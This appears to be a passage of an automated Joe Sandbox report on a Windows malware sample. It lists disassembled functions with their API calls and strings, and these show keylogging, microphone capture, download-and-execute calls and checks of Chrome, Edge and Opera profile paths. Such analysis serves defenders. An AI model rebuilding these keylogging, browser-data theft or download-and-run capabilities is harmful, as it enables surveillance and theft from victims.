                                                  • Instruction Fuzzy Hash: E62104719007806BD710B732A80A76F7B64E755308F44057EE8491B2A2EB7D5988CBDE
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: xQ
                                                  • API String ID: 269201875-532350464
                                                  • Opcode ID: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                                  • Instruction ID: 50f29c45267cc5de65db45c76c11a9fc4df43ae0f191c64cb21c29ff245d41fa
                                                  • Opcode Fuzzy Hash: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                                  • Instruction Fuzzy Hash: 9011D371A002004AEF309F39AC81B563294A714734F15172BF929EA3D6D3BCD8825F89
                                                  APIs
                                                  • Sleep.KERNEL32 ref: 0041667B
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadFileSleep
                                                  • String ID: !D@
                                                  • API String ID: 1931167962-604454484
                                                  • Opcode ID: 92ea2b7c7d4dd54adae981815a4ff994f6a572d7f14227422f7246d043ae43ea
                                                  • Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
                                                  • Opcode Fuzzy Hash: 92ea2b7c7d4dd54adae981815a4ff994f6a572d7f14227422f7246d043ae43ea
                                                  • Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 1f6487869d629dcf1e204b5f0f5ae6d5458ee725863aa9b16601543d7114203f
                                                  • Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
                                                  • Opcode Fuzzy Hash: 1f6487869d629dcf1e204b5f0f5ae6d5458ee725863aa9b16601543d7114203f
                                                  • Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$xYG
                                                  • API String ID: 1174141254-3120134784
                                                  • Opcode ID: e896a2137ff3723848122a701fe482f0adb1845bc6ea02ce90ea158c4c198fc4
                                                  • Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
                                                  • Opcode Fuzzy Hash: e896a2137ff3723848122a701fe482f0adb1845bc6ea02ce90ea158c4c198fc4
                                                  • Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: db938f389705648afc019bc45075e946589340b1647771a4610b679f41f737d7
                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                  • Opcode Fuzzy Hash: db938f389705648afc019bc45075e946589340b1647771a4610b679f41f737d7
                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                  • _free.LIBCMT ref: 00449B4C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$DeleteEnter_free
                                                  • String ID: xQ
                                                  • API String ID: 1836352639-532350464
                                                  • Opcode ID: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                  • Instruction ID: 49f98359192604db3700e7d46e2ee0879056decf89b11c46129577f8840becb7
                                                  • Opcode Fuzzy Hash: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                                  • Instruction Fuzzy Hash: C3115E31500214DFEB20DFA8E846B5D73B0FB04724F10455AE8599B2E6CBBCEC429B0D
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _abort.LIBCMT ref: 0044F129
                                                  • _free.LIBCMT ref: 0044F15D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_abort_free
                                                  • String ID: IP
                                                  • API String ID: 289325740-2933993764
                                                  • Opcode ID: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                                  • Instruction ID: a8e40e627a719db10bf70d85eeadc0c4c2fb790701f4ec7f842983f146219858
                                                  • Opcode Fuzzy Hash: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                                  • Instruction Fuzzy Hash: 0501A1B1D01A21DBEB31AFA9D84265EB3A0BF04720B19012FE51463391CB386D46CBCE
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(0050E918,00000020,?,?,00476B60,00474EF0,?,00000000,00401A15), ref: 00401849
                                                  • waveInAddBuffer.WINMM(0050E918,00000020,?,00000000,00401A15), ref: 0040185F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: }P
                                                  • API String ID: 2315374483-922143165
                                                  • Opcode ID: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                                  • Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
                                                  • Opcode Fuzzy Hash: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                                  • Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: H%P
                                                  • API String ID: 269201875-38831225
                                                  • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                  • Instruction ID: 4a6f060c21597e0392f33703011e6e0157da39883ddad7ec559e06d861eb6f1f
                                                  • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                                  • Instruction Fuzzy Hash: 64E0E532A0152014F6713A3B6D1665B45C68BC1B3AF22423FF425962C2DFAC8946516E
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$kKD
                                                  • API String ID: 1901932003-3269126172
                                                  • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                  • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                  • API String ID: 1174141254-4188645398
                                                  • Opcode ID: 9ec6e1fe470e75b4b7bd505e7d33cea887ccc947293c24eac1b2210c04fb0491
                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                  • Opcode Fuzzy Hash: 9ec6e1fe470e75b4b7bd505e7d33cea887ccc947293c24eac1b2210c04fb0491
                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                  • API String ID: 1174141254-2800177040
                                                  • Opcode ID: d0e8325f707f7c4eb953088383968214ae3a5d5ea720061d1907931e89882a07
                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                  • Opcode Fuzzy Hash: d0e8325f707f7c4eb953088383968214ae3a5d5ea720061d1907931e89882a07
                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                  • API String ID: 1174141254-1629609700
                                                  • Opcode ID: 2447952df96dfdf6470855f7168a1331a65a94fbb2c478d055a1a31cb3e803bc
                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                  • Opcode Fuzzy Hash: 2447952df96dfdf6470855f7168a1331a65a94fbb2c478d055a1a31cb3e803bc
                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: $G
                                                  • API String ID: 269201875-4251033865
                                                  • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                  • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                                  • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                  • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(00000000,?,00000000,0040B245,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: e426c8fbeabb07d9abd34178f1097d2367636f6fc7a1368524095d745c426b1a
                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                  • Opcode Fuzzy Hash: e426c8fbeabb07d9abd34178f1097d2367636f6fc7a1368524095d745c426b1a
                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: !D@$open
                                                  • API String ID: 587946157-1586967515
                                                  • Opcode ID: 123f3005351d9319ab9640cf94be40b0b125891abe94fb4f7f64a0320ee6aa85
                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                  • Opcode Fuzzy Hash: 123f3005351d9319ab9640cf94be40b0b125891abe94fb4f7f64a0320ee6aa85
                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 58e70e30c0f3956dbd3e008be278b4fb6e6efd0531d4114be24f944b376f2658
                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                  • Opcode Fuzzy Hash: 58e70e30c0f3956dbd3e008be278b4fb6e6efd0531d4114be24f944b376f2658
                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                  APIs
                                                    • Part of subcall function 00449ADC: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                    • Part of subcall function 00449ADC: _free.LIBCMT ref: 00449B4C
                                                    • Part of subcall function 00449B7C: _free.LIBCMT ref: 00449B9E
                                                  • DeleteCriticalSection.KERNEL32(005178C8), ref: 0043C241
                                                  • _free.LIBCMT ref: 0043C255
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$CriticalDeleteSection
                                                  • String ID: xQ
                                                  • API String ID: 1906768660-532350464
